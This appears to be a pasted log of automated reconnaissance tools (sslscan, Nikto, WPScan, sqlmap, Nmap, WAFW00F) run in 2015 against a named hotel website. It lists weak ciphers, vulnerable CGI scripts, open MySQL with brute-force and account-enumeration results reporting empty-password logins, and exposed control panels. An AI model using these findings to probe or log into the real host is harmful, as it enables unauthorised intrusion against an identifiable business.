- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 128 bits SEED-SHA
- Accepted TLSv1.2 128 bits CAMELLIA128-SHA
- Accepted TLSv1.2 128 bits IDEA-CBC-SHA
- Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits RC4-SHA
- Preferred Server Cipher(s):
- TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.websitewelcome.com
- Altnames: DNS:*.websitewelcome.com, DNS:websitewelcome.com
- Issuer: COMODO RSA Domain Validation Secure Server CA
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.185.26.214
- + Target Hostname: www.lasdunashotel.com
- + Target Port: 443
- ---------------------------------------------------------------------------
- + SSL Info: Subject: /OU=Domain Control Validated/OU=Hosted by HostGator.com, LLC./OU=PositiveSSL Wildcard/CN=*.websitewelcome.com
- Ciphers: ECDHE-RSA-AES256-GCM-SHA384
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Domain Validation Secure Server CA
- + Start Time: 2015-09-29 14:39:26 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: /404.html
- + Server is using a wildcard certificate: *.websitewelcome.com
- + Hostname 'www.lasdunashotel.com' does not match certificate's names: *.websitewelcome.com
- + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: : Argumento inválido
- + Scan terminated: 7 error(s) and 7 item(s) reported on remote host
- + End Time: 2015-09-29 15:05:09 (GMT-4) (1543 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- _______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __
- \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \___|\__,_|_| |_|
- WordPress Security Scanner by the WPScan Team
- Version 2.8
- Sponsored by Sucuri - https://sucuri.net
- @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
- _______________________________________________________________
- [!] The WordPress URL supplied 'https://www.lasdunashotel.com/' seems to be down.
- [ERROR] Website Unreachable: https://www.lasdunashotel.com
- _
- ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150928}
- |_ -| . | | | .'| . |
- |___|_ |_|_|_|_|__,| _|
- |_| |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 15:05:42
- do you want to check for the existence of site's sitemap(.xml) [y/N] n
- [15:05:42] [INFO] starting crawler
- [15:05:42] [INFO] searching for links with depth 1
- sqlmap got a 302 redirect to 'https://www.lasdunashotel.com:443/404.html'. Do you want to follow? [Y/n] Y
- [15:05:44] [INFO] heuristics detected web page charset 'ISO-8859-2'
- [15:05:44] [INFO] searching for links with depth 2
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:44] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [INFO] searching for links with depth 3
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:46] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [INFO] searching for links with depth 4
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:46] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [INFO] searching for links with depth 5
- please enter number of threads? [Enter for 1 (current)] 1
- [15:05:46] [WARNING] running in a single-thread mode. This could take a while
- [15:05:46] [WARNING] no usable links found (with GET parameters)
- [*] shutting down at 15:05:46
- + -- --=[Port 445 closed... skipping.
- + -- --=[Port 512 closed... skipping.
- + -- --=[Port 513 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 514 closed... skipping.
- + -- --=[Port 2121 closed... skipping.
- + -- --=[Port 3306 opened... running tests...
- Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-29 15:05 EDT
- Nmap scan report for www.lasdunashotel.com (192.185.26.214)
- Host is up (0.017s latency).
- rDNS record for 192.185.26.214: 192-185-26-214.unifiedlayer.com
- PORT STATE SERVICE VERSION
- 3306/tcp open mysql MySQL 5.5.42-37.1
- | mysql-audit:
- |_ No audit rulebase file was supplied (see mysql-audit.filename)
- | mysql-brute:
- | Accounts: No valid accounts found
- | Statistics: Performed 81 guesses in 71 seconds, average tps: 1
- |_ ERROR: Too many retries, aborted ...
- | mysql-enum:
- | Valid usernames:
- | root:<empty> - Valid credentials
- | netadmin:<empty> - Valid credentials
- | guest:<empty> - Valid credentials
- | user:<empty> - Valid credentials
- | web:<empty> - Valid credentials
- | sysadmin:<empty> - Valid credentials
- | administrator:<empty> - Valid credentials
- | webadmin:<empty> - Valid credentials
- | admin:<empty> - Valid credentials
- | test:<empty> - Valid credentials
- |_ Statistics: Performed 10 guesses in 69 seconds, average tps: 0
- | mysql-info:
- | Protocol: 53
- | Version: .5.42-37.1
- | Thread ID: 17373659
- | Capabilities flags: 65535
- | Some Capabilities: ConnectWithDatabase, LongPassword, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolOld, SupportsTransactions, FoundRows, SwitchToSSLAfterHandshake, Support41Auth, IgnoreSigpipes, SupportsLoadDataLocal, ODBCClient, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, DontAllowDatabaseTableColumn
- | Status: Autocommit
- |_ Salt: h.Ic:7D0c##%0bzaXtaf
- |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 74.74 seconds
- + -- --=[Port 3389 closed... skipping.
- + -- --=[Port 5432 closed... skipping.
- + -- --=[Port 5800 closed... skipping.
- + -- --=[Port 5900 closed... skipping.
- + -- --=[Port 6000 closed... skipping.
- + -- --=[Port 6667 closed... skipping.
- + -- --=[Port 8000 closed... skipping.
- + -- --=[Port 8100 closed... skipping.
- + -- --=[Port 8080 opened... running tests...
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://www.lasdunashotel.com:8080
- Generic Detection results:
- The site http://www.lasdunashotel.com:8080 seems to be behind a WAF
- Reason: The server returned a different response code when a string trigged the blacklist.
- Normal response code is "302", while the response code to an attack is "406"
- Number of requests: 10
- http://www.lasdunashotel.com:8080 [200] Country[UNITED STATES][US], HTTPServer[nginx/1.8.0], IP[192.185.26.214], nginx[1.8.0]
- ./sniper: línea 483: xsstracer: no se encontró la orden
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.185.26.214
- + Target Hostname: www.lasdunashotel.com
- + Target Port: 8080
- + Start Time: 2015-09-29 15:08:07 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: nginx/1.8.0
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
- + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
- + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
- + /securecontrolpanel/: Web Server Control Panel
- + /webmail/: Web based mail package installed.
- + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
- + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-2117: /cpanel/: Web-based control panel
- + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
- + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
- + OSVDB-3268: /includes/: Directory indexing found.
- + OSVDB-3092: /includes/: This might be interesting...
- + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
- + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
- + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
- + OSVDB-3268: /images/: Directory indexing found.
- + OSVDB-3268: /style/: Directory indexing found.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement